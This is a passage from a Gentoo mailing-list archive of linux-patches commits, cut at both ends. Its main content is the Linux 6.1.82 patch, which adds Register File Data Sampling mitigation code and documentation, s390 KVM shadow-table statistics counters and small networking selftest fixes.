+-	PING_COUNT=100 PING_TIMEOUT=11 ping_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 10 100
+@@ -522,7 +522,7 @@ __ping_ipv6()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome neighbor discovery noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping6_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping6_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 100
+diff --git a/tools/testing/selftests/net/tls.c b/tools/testing/selftests/net/tls.c
+index 5b80fb155d549..d89ee6e1926c7 100644
+--- a/tools/testing/selftests/net/tls.c
++++ b/tools/testing/selftests/net/tls.c
+@@ -926,12 +926,12 @@ TEST_F(tls, recv_partial)
+ 
+ 	memset(recv_mem, 0, sizeof(recv_mem));
+ 	EXPECT_EQ(send(self->fd, test_str, send_len, 0), send_len);
+-	EXPECT_NE(recv(self->cfd, recv_mem, strlen(test_str_first),
+-		       MSG_WAITALL), -1);
++	EXPECT_EQ(recv(self->cfd, recv_mem, strlen(test_str_first),
++		       MSG_WAITALL), strlen(test_str_first));
+ 	EXPECT_EQ(memcmp(test_str_first, recv_mem, strlen(test_str_first)), 0);
+ 	memset(recv_mem, 0, sizeof(recv_mem));
+-	EXPECT_NE(recv(self->cfd, recv_mem, strlen(test_str_second),
+-		       MSG_WAITALL), -1);
++	EXPECT_EQ(recv(self->cfd, recv_mem, strlen(test_str_second),
++		       MSG_WAITALL), strlen(test_str_second));
+ 	EXPECT_EQ(memcmp(test_str_second, recv_mem, strlen(test_str_second)),
+ 		  0);
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-15 22:00 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-15 22:00 UTC (permalink / raw
  To: gentoo-commits

commit:     5de092155dd2e46a47672e5a9edb72eb15f4cbc1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 15 22:00:42 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 15 22:00:42 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5de09215

Linux patch 6.1.82

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1081_linux-6.1.82.patch | 2221 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2225 insertions(+)

diff --git a/0000_README b/0000_README
index d0f067de..db3a7674 100644
--- a/0000_README
+++ b/0000_README
@@ -367,6 +367,10 @@ Patch:  1080_linux-6.1.81.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.81
 
+Patch:  1081_linux-6.1.82.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.82
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1081_linux-6.1.82.patch b/1081_linux-6.1.82.patch
new file mode 100644
index 00000000..23680cee
--- /dev/null
+++ b/1081_linux-6.1.82.patch
@@ -0,0 +1,2221 @@
+diff --git a/Documentation/ABI/testing/sysfs-devices-system-cpu b/Documentation/ABI/testing/sysfs-devices-system-cpu
+index 13c01b641dc70..78c26280c473b 100644
+--- a/Documentation/ABI/testing/sysfs-devices-system-cpu
++++ b/Documentation/ABI/testing/sysfs-devices-system-cpu
+@@ -519,6 +519,7 @@ What:		/sys/devices/system/cpu/vulnerabilities
+ 		/sys/devices/system/cpu/vulnerabilities/mds
+ 		/sys/devices/system/cpu/vulnerabilities/meltdown
+ 		/sys/devices/system/cpu/vulnerabilities/mmio_stale_data
++		/sys/devices/system/cpu/vulnerabilities/reg_file_data_sampling
+ 		/sys/devices/system/cpu/vulnerabilities/retbleed
+ 		/sys/devices/system/cpu/vulnerabilities/spec_store_bypass
+ 		/sys/devices/system/cpu/vulnerabilities/spectre_v1
+diff --git a/Documentation/admin-guide/hw-vuln/index.rst b/Documentation/admin-guide/hw-vuln/index.rst
+index 6828102baaa7a..3e4a14e38b49e 100644
+--- a/Documentation/admin-guide/hw-vuln/index.rst
++++ b/Documentation/admin-guide/hw-vuln/index.rst
+@@ -21,3 +21,4 @@ are configurable at compile, boot or run time.
+    cross-thread-rsb.rst
+    gather_data_sampling.rst
+    srso
++   reg-file-data-sampling
+diff --git a/Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst b/Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst
+new file mode 100644
+index 0000000000000..0585d02b9a6cb
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst
+@@ -0,0 +1,104 @@
++==================================
++Register File Data Sampling (RFDS)
++==================================
++
++Register File Data Sampling (RFDS) is a microarchitectural vulnerability that
++only affects Intel Atom parts(also branded as E-cores). RFDS may allow
++a malicious actor to infer data values previously used in floating point
++registers, vector registers, or integer registers. RFDS does not provide the
++ability to choose which data is inferred. CVE-2023-28746 is assigned to RFDS.
++
++Affected Processors
++===================
++Below is the list of affected Intel processors [#f1]_:
++
++   ===================  ============
++   Common name          Family_Model
++   ===================  ============
++   ATOM_GOLDMONT           06_5CH
++   ATOM_GOLDMONT_D         06_5FH
++   ATOM_GOLDMONT_PLUS      06_7AH
++   ATOM_TREMONT_D          06_86H
++   ATOM_TREMONT            06_96H
++   ALDERLAKE               06_97H
++   ALDERLAKE_L             06_9AH
++   ATOM_TREMONT_L          06_9CH
++   RAPTORLAKE              06_B7H
++   RAPTORLAKE_P            06_BAH
++   ATOM_GRACEMONT          06_BEH
++   RAPTORLAKE_S            06_BFH
++   ===================  ============
++
++As an exception to this table, Intel Xeon E family parts ALDERLAKE(06_97H) and
++RAPTORLAKE(06_B7H) codenamed Catlow are not affected. They are reported as
++vulnerable in Linux because they share the same family/model with an affected
++part. Unlike their affected counterparts, they do not enumerate RFDS_CLEAR or
++CPUID.HYBRID. This information could be used to distinguish between the
++affected and unaffected parts, but it is deemed not worth adding complexity as
++the reporting is fixed automatically when these parts enumerate RFDS_NO.
++
++Mitigation
++==========
++Intel released a microcode update that enables software to clear sensitive
++information using the VERW instruction. Like MDS, RFDS deploys the same
++mitigation strategy to force the CPU to clear the affected buffers before an
++attacker can extract the secrets. This is achieved by using the otherwise
++unused and obsolete VERW instruction in combination with a microcode update.
++The microcode clears the affected CPU buffers when the VERW instruction is
++executed.
++
++Mitigation points
++-----------------
++VERW is executed by the kernel before returning to user space, and by KVM
++before VMentry. None of the affected cores support SMT, so VERW is not required
++at C-state transitions.
++
++New bits in IA32_ARCH_CAPABILITIES
++----------------------------------
++Newer processors and microcode update on existing affected processors added new
++bits to IA32_ARCH_CAPABILITIES MSR. These bits can be used to enumerate
++vulnerability and mitigation capability:
++
++- Bit 27 - RFDS_NO - When set, processor is not affected by RFDS.
++- Bit 28 - RFDS_CLEAR - When set, processor is affected by RFDS, and has the
++  microcode that clears the affected buffers on VERW execution.
++
++Mitigation control on the kernel command line
++---------------------------------------------
++The kernel command line allows to control RFDS mitigation at boot time with the
++parameter "reg_file_data_sampling=". The valid arguments are:
++
++  ==========  =================================================================
++  on          If the CPU is vulnerable, enable mitigation; CPU buffer clearing
++              on exit to userspace and before entering a VM.
++  off         Disables mitigation.
++  ==========  =================================================================
++
++Mitigation default is selected by CONFIG_MITIGATION_RFDS.
++
++Mitigation status information
++-----------------------------
++The Linux kernel provides a sysfs interface to enumerate the current
++vulnerability status of the system: whether the system is vulnerable, and
++which mitigations are active. The relevant sysfs file is:
++
++	/sys/devices/system/cpu/vulnerabilities/reg_file_data_sampling
++
++The possible values in this file are:
++
++  .. list-table::
++
++     * - 'Not affected'
++       - The processor is not vulnerable
++     * - 'Vulnerable'
++       - The processor is vulnerable, but no mitigation enabled
++     * - 'Vulnerable: No microcode'
++       - The processor is vulnerable but microcode is not updated.
++     * - 'Mitigation: Clear Register File'
++       - The processor is vulnerable and the CPU buffer clearing mitigation is
++	 enabled.
++
++References
++----------
++.. [#f1] Affected Processors
++   https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 4ad60e127e048..2dfe75104e7de 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -1107,6 +1107,26 @@
+ 			The filter can be disabled or changed to another
+ 			driver later using sysfs.
+ 
++	reg_file_data_sampling=
++			[X86] Controls mitigation for Register File Data
++			Sampling (RFDS) vulnerability. RFDS is a CPU
++			vulnerability which may allow userspace to infer
++			kernel data values previously stored in floating point
++			registers, vector registers, or integer registers.
++			RFDS only affects Intel Atom processors.
++
++			on:	Turns ON the mitigation.
++			off:	Turns OFF the mitigation.
++
++			This parameter overrides the compile time default set
++			by CONFIG_MITIGATION_RFDS. Mitigation cannot be
++			disabled when other VERW based mitigations (like MDS)
++			are enabled. In order to disable RFDS mitigation all
++			VERW based mitigations need to be disabled.
++
++			For details see:
++			Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst
++
+ 	driver_async_probe=  [KNL]
+ 			List of driver names to be probed asynchronously. *
+ 			matches with all driver names. If * is specified, the
+@@ -3262,6 +3282,7 @@
+ 					       nospectre_bhb [ARM64]
+ 					       nospectre_v1 [X86,PPC]
+ 					       nospectre_v2 [X86,PPC,S390,ARM64]
++					       reg_file_data_sampling=off [X86]
+ 					       retbleed=off [X86]
+ 					       spec_store_bypass_disable=off [X86,PPC]
+ 					       spectre_v2_user=off [X86]
+diff --git a/Makefile b/Makefile
+index e13df565a1cb6..c5345f3ebed0d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 81
++SUBLEVEL = 82
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/s390/include/asm/kvm_host.h b/arch/s390/include/asm/kvm_host.h
+index b1e98a9ed152b..09abf000359f8 100644
+--- a/arch/s390/include/asm/kvm_host.h
++++ b/arch/s390/include/asm/kvm_host.h
+@@ -777,6 +777,13 @@ struct kvm_vm_stat {
+ 	u64 inject_service_signal;
+ 	u64 inject_virtio;
+ 	u64 aen_forward;
++	u64 gmap_shadow_create;
++	u64 gmap_shadow_reuse;
++	u64 gmap_shadow_r1_entry;
++	u64 gmap_shadow_r2_entry;
++	u64 gmap_shadow_r3_entry;
++	u64 gmap_shadow_sg_entry;
++	u64 gmap_shadow_pg_entry;
+ };
+ 
+ struct kvm_arch_memory_slot {
+diff --git a/arch/s390/kvm/gaccess.c b/arch/s390/kvm/gaccess.c
+index 0243b6e38d364..3beceff5f1c09 100644
+--- a/arch/s390/kvm/gaccess.c
++++ b/arch/s390/kvm/gaccess.c
+@@ -1273,6 +1273,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 				  unsigned long *pgt, int *dat_protection,
+ 				  int *fake)
+ {
++	struct kvm *kvm;
+ 	struct gmap *parent;
+ 	union asce asce;
+ 	union vaddress vaddr;
+@@ -1281,6 +1282,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 
+ 	*fake = 0;
+ 	*dat_protection = 0;
++	kvm = sg->private;
+ 	parent = sg->parent;
+ 	vaddr.addr = saddr;
+ 	asce.val = sg->orig_asce;
+@@ -1341,6 +1343,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_r2t(sg, saddr, rfte.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_r1_entry++;
+ 	}
+ 		fallthrough;
+ 	case ASCE_TYPE_REGION2: {
+@@ -1369,6 +1372,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_r3t(sg, saddr, rste.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_r2_entry++;
+ 	}
+ 		fallthrough;
+ 	case ASCE_TYPE_REGION3: {
+@@ -1406,6 +1410,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_sgt(sg, saddr, rtte.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_r3_entry++;
+ 	}
+ 		fallthrough;
+ 	case ASCE_TYPE_SEGMENT: {
+@@ -1439,6 +1444,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_pgt(sg, saddr, ste.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_sg_entry++;
+ 	}
+ 	}
+ 	/* Return the parent address of the page table */
+@@ -1509,6 +1515,7 @@ int kvm_s390_shadow_fault(struct kvm_vcpu *vcpu, struct gmap *sg,
+ 	pte.p |= dat_protection;
+ 	if (!rc)
+ 		rc = gmap_shadow_page(sg, saddr, __pte(pte.val));
++	vcpu->kvm->stat.gmap_shadow_pg_entry++;
+ 	ipte_unlock(vcpu->kvm);
+ 	mmap_read_unlock(sg->mm);
+ 	return rc;
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index f604946ab2c85..348d49268a7ec 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -66,7 +66,14 @@ const struct _kvm_stats_desc kvm_vm_stats_desc[] = {
+ 	STATS_DESC_COUNTER(VM, inject_pfault_done),
+ 	STATS_DESC_COUNTER(VM, inject_service_signal),
+ 	STATS_DESC_COUNTER(VM, inject_virtio),
+-	STATS_DESC_COUNTER(VM, aen_forward)
++	STATS_DESC_COUNTER(VM, aen_forward),
++	STATS_DESC_COUNTER(VM, gmap_shadow_reuse),
++	STATS_DESC_COUNTER(VM, gmap_shadow_create),
++	STATS_DESC_COUNTER(VM, gmap_shadow_r1_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_r2_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_r3_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_sg_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_pg_entry),
+ };
+ 
+ const struct kvm_stats_header kvm_vm_stats_header = {
+diff --git a/arch/s390/kvm/vsie.c b/arch/s390/kvm/vsie.c
+index 740f8b56e63f9..d90c818a9ae71 100644
+--- a/arch/s390/kvm/vsie.c
++++ b/arch/s390/kvm/vsie.c
+@@ -1206,15 +1206,17 @@ static int acquire_gmap_shadow(struct kvm_vcpu *vcpu,
+ 	 * we're holding has been unshadowed. If the gmap is still valid,
+ 	 * we can safely reuse it.
+ 	 */
+-	if (vsie_page->gmap && gmap_shadow_valid(vsie_page->gmap, asce, edat))
++	if (vsie_page->gmap && gmap_shadow_valid(vsie_page->gmap, asce, edat)) {
++		vcpu->kvm->stat.gmap_shadow_reuse++;
+ 		return 0;
++	}
+ 
+ 	/* release the old shadow - if any, and mark the prefix as unmapped */
+ 	release_gmap_shadow(vsie_page);
+ 	gmap = gmap_shadow(vcpu->arch.gmap, asce, edat);
+ 	if (IS_ERR(gmap))
+ 		return PTR_ERR(gmap);
+-	gmap->private = vcpu->kvm;
++	vcpu->kvm->stat.gmap_shadow_create++;
+ 	WRITE_ONCE(vsie_page->gmap, gmap);
+ 	return 0;
+ }
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 243f673fa6515..662cf23a1b44b 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -1675,6 +1675,7 @@ struct gmap *gmap_shadow(struct gmap *parent, unsigned long asce,
+ 		return ERR_PTR(-ENOMEM);
+ 	new->mm = parent->mm;
+ 	new->parent = gmap_get(parent);
++	new->private = parent->private;
+ 	new->orig_asce = asce;
+ 	new->edat_level = edat_level;
+ 	new->initialized = false;
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 2f7af61b49b6c..5caa023e98397 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -2565,6 +2565,17 @@ config GDS_FORCE_MITIGATION
+ 
+ 	  If in doubt, say N.
+ 
++config MITIGATION_RFDS
++	bool "RFDS Mitigation"
++	depends on CPU_SUP_INTEL
++	default y
++	help
++	  Enable mitigation for Register File Data Sampling (RFDS) by default.
++	  RFDS is a hardware vulnerability which affects Intel Atom CPUs. It
++	  allows unprivileged speculative access to stale data previously
++	  stored in floating point, vector and integer registers.
++	  See also <file:Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst>
++
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b60f24b30cb90..b97a70aa4de90 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -477,4 +477,5 @@
+ /* BUG word 2 */
+ #define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
+ #define X86_BUG_DIV0			X86_BUG(1*32 + 1) /* AMD DIV0 speculation bug */
++#define X86_BUG_RFDS			X86_BUG(1*32 + 2) /* CPU is vulnerable to Register File Data Sampling */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index ec955ab2ff034..005e41dc7ee5a 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -168,6 +168,14 @@
+ 						 * CPU is not vulnerable to Gather
+ 						 * Data Sampling (GDS).
+ 						 */
++#define ARCH_CAP_RFDS_NO		BIT(27)	/*
++						 * Not susceptible to Register
++						 * File Data Sampling.
++						 */
++#define ARCH_CAP_RFDS_CLEAR		BIT(28)	/*
++						 * VERW clears CPU Register
++						 * File.
++						 */
+ 
+ #define ARCH_CAP_XAPIC_DISABLE		BIT(21)	/*
+ 						 * IA32_XAPIC_DISABLE_STATUS MSR
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index d1895930e6eb8..c68789fdc123b 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -421,6 +421,13 @@ static void __init mmio_select_mitigation(void)
+ 	if (boot_cpu_has_bug(X86_BUG_MDS) || (boot_cpu_has_bug(X86_BUG_TAA) &&
+ 					      boot_cpu_has(X86_FEATURE_RTM)))
+ 		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
++
++	/*
++	 * X86_FEATURE_CLEAR_CPU_BUF could be enabled by other VERW based
++	 * mitigations, disable KVM-only mitigation in that case.
++	 */
++	if (boot_cpu_has(X86_FEATURE_CLEAR_CPU_BUF))
++		static_branch_disable(&mmio_stale_data_clear);
+ 	else
+ 		static_branch_enable(&mmio_stale_data_clear);
+ 
+@@ -472,6 +479,57 @@ static int __init mmio_stale_data_parse_cmdline(char *str)
+ }
+ early_param("mmio_stale_data", mmio_stale_data_parse_cmdline);
+ 
++#undef pr_fmt
++#define pr_fmt(fmt)	"Register File Data Sampling: " fmt
++
++enum rfds_mitigations {
++	RFDS_MITIGATION_OFF,
++	RFDS_MITIGATION_VERW,
++	RFDS_MITIGATION_UCODE_NEEDED,
++};
++
++/* Default mitigation for Register File Data Sampling */
++static enum rfds_mitigations rfds_mitigation __ro_after_init =
++	IS_ENABLED(CONFIG_MITIGATION_RFDS) ? RFDS_MITIGATION_VERW : RFDS_MITIGATION_OFF;
++
++static const char * const rfds_strings[] = {
++	[RFDS_MITIGATION_OFF]			= "Vulnerable",
++	[RFDS_MITIGATION_VERW]			= "Mitigation: Clear Register File",
++	[RFDS_MITIGATION_UCODE_NEEDED]		= "Vulnerable: No microcode",
++};
++
++static void __init rfds_select_mitigation(void)
++{
++	if (!boot_cpu_has_bug(X86_BUG_RFDS) || cpu_mitigations_off()) {
++		rfds_mitigation = RFDS_MITIGATION_OFF;
++		return;
++	}
++	if (rfds_mitigation == RFDS_MITIGATION_OFF)
++		return;
++
++	if (x86_read_arch_cap_msr() & ARCH_CAP_RFDS_CLEAR)
++		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
++	else
++		rfds_mitigation = RFDS_MITIGATION_UCODE_NEEDED;
++}
++
++static __init int rfds_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!boot_cpu_has_bug(X86_BUG_RFDS))
++		return 0;
++
++	if (!strcmp(str, "off"))
++		rfds_mitigation = RFDS_MITIGATION_OFF;
++	else if (!strcmp(str, "on"))
++		rfds_mitigation = RFDS_MITIGATION_VERW;
++
++	return 0;
++}
++early_param("reg_file_data_sampling", rfds_parse_cmdline);
++
+ #undef pr_fmt
+ #define pr_fmt(fmt)     "" fmt
+ 
+@@ -497,11 +555,19 @@ static void __init md_clear_update_mitigation(void)
+ 		taa_mitigation = TAA_MITIGATION_VERW;
+ 		taa_select_mitigation();
+ 	}
+-	if (mmio_mitigation == MMIO_MITIGATION_OFF &&
+-	    boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA)) {
++	/*
++	 * MMIO_MITIGATION_OFF is not checked here so that mmio_stale_data_clear
++	 * gets updated correctly as per X86_FEATURE_CLEAR_CPU_BUF state.
++	 */
++	if (boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA)) {
+ 		mmio_mitigation = MMIO_MITIGATION_VERW;
+ 		mmio_select_mitigation();
+ 	}
++	if (rfds_mitigation == RFDS_MITIGATION_OFF &&
++	    boot_cpu_has_bug(X86_BUG_RFDS)) {
++		rfds_mitigation = RFDS_MITIGATION_VERW;
++		rfds_select_mitigation();
++	}
+ out:
+ 	if (boot_cpu_has_bug(X86_BUG_MDS))
+ 		pr_info("MDS: %s\n", mds_strings[mds_mitigation]);
+@@ -511,6 +577,8 @@ static void __init md_clear_update_mitigation(void)
+ 		pr_info("MMIO Stale Data: %s\n", mmio_strings[mmio_mitigation]);
+ 	else if (boot_cpu_has_bug(X86_BUG_MMIO_UNKNOWN))
+ 		pr_info("MMIO Stale Data: Unknown: No mitigations\n");
++	if (boot_cpu_has_bug(X86_BUG_RFDS))
++		pr_info("Register File Data Sampling: %s\n", rfds_strings[rfds_mitigation]);
+ }
+ 
+ static void __init md_clear_select_mitigation(void)
+@@ -518,11 +586,12 @@ static void __init md_clear_select_mitigation(void)
+ 	mds_select_mitigation();
+ 	taa_select_mitigation();
+ 	mmio_select_mitigation();
++	rfds_select_mitigation();
+ 
+ 	/*
+-	 * As MDS, TAA and MMIO Stale Data mitigations are inter-related, update
+-	 * and print their mitigation after MDS, TAA and MMIO Stale Data
+-	 * mitigation selection is done.
++	 * As these mitigations are inter-related and rely on VERW instruction
++	 * to clear the microarchitural buffers, update and print their status
++	 * after mitigation selection is done for each of these vulnerabilities.
+ 	 */
+ 	md_clear_update_mitigation();
+ }
+@@ -2586,6 +2655,11 @@ static ssize_t mmio_stale_data_show_state(char *buf)
+ 			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
++static ssize_t rfds_show_state(char *buf)
++{
++	return sysfs_emit(buf, "%s\n", rfds_strings[rfds_mitigation]);
++}
++
+ static char *stibp_state(void)
+ {
+ 	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+@@ -2747,6 +2821,9 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 	case X86_BUG_SRSO:
+ 		return srso_show_state(buf);
+ 
++	case X86_BUG_RFDS:
++		return rfds_show_state(buf);
++
+ 	default:
+ 		break;
+ 	}
+@@ -2821,4 +2898,9 @@ ssize_t cpu_show_spec_rstack_overflow(struct device *dev, struct device_attribut
+ {
+ 	return cpu_show_common(dev, attr, buf, X86_BUG_SRSO);
+ }
++
++ssize_t cpu_show_reg_file_data_sampling(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	return cpu_show_common(dev, attr, buf, X86_BUG_RFDS);
++}
+ #endif
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 454cdf3418624..758938c94b41e 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1248,6 +1248,8 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ #define SRSO		BIT(5)
+ /* CPU is affected by GDS */
+ #define GDS		BIT(6)
++/* CPU is affected by Register File Data Sampling */
++#define RFDS		BIT(7)
+ 
+ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(IVYBRIDGE,	X86_STEPPING_ANY,		SRBDS),
+@@ -1275,9 +1277,18 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(TIGERLAKE,	X86_STEPPING_ANY,		GDS),
+ 	VULNBL_INTEL_STEPPINGS(LAKEFIELD,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
+ 	VULNBL_INTEL_STEPPINGS(ROCKETLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+-	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
+-	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_D,	X86_STEPPING_ANY,		MMIO),
+-	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
++	VULNBL_INTEL_STEPPINGS(ALDERLAKE,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ALDERLAKE_L,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(RAPTORLAKE,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(RAPTORLAKE_P,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(RAPTORLAKE_S,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ALDERLAKE_N,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_D,	X86_STEPPING_ANY,		MMIO | RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_GOLDMONT,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_GOLDMONT_D,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_GOLDMONT_PLUS, X86_STEPPING_ANY,		RFDS),
+ 
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+@@ -1311,6 +1322,24 @@ static bool arch_cap_mmio_immune(u64 ia32_cap)
+ 		ia32_cap & ARCH_CAP_SBDR_SSDP_NO);
+ }
+ 
++static bool __init vulnerable_to_rfds(u64 ia32_cap)
++{
++	/* The "immunity" bit trumps everything else: */
++	if (ia32_cap & ARCH_CAP_RFDS_NO)
++		return false;
++
++	/*
++	 * VMMs set ARCH_CAP_RFDS_CLEAR for processors not in the blacklist to
++	 * indicate that mitigation is needed because guest is running on a
++	 * vulnerable hardware or may migrate to such hardware:
++	 */
++	if (ia32_cap & ARCH_CAP_RFDS_CLEAR)
++		return true;
++
++	/* Only consult the blacklist when there is no enumeration: */
++	return cpu_matches(cpu_vuln_blacklist, RFDS);
++}
++
+ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ {
+ 	u64 ia32_cap = x86_read_arch_cap_msr();
+@@ -1419,6 +1448,9 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 			setup_force_cpu_bug(X86_BUG_SRSO);
+ 	}
+ 
++	if (vulnerable_to_rfds(ia32_cap))
++		setup_force_cpu_bug(X86_BUG_RFDS);
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 7144e51668136..688bc7b72eb66 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -1613,7 +1613,8 @@ static unsigned int num_msr_based_features;
+ 	 ARCH_CAP_SKIP_VMENTRY_L1DFLUSH | ARCH_CAP_SSB_NO | ARCH_CAP_MDS_NO | \
+ 	 ARCH_CAP_PSCHANGE_MC_NO | ARCH_CAP_TSX_CTRL_MSR | ARCH_CAP_TAA_NO | \
+ 	 ARCH_CAP_SBDR_SSDP_NO | ARCH_CAP_FBSDP_NO | ARCH_CAP_PSDP_NO | \
+-	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO)
++	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO | \
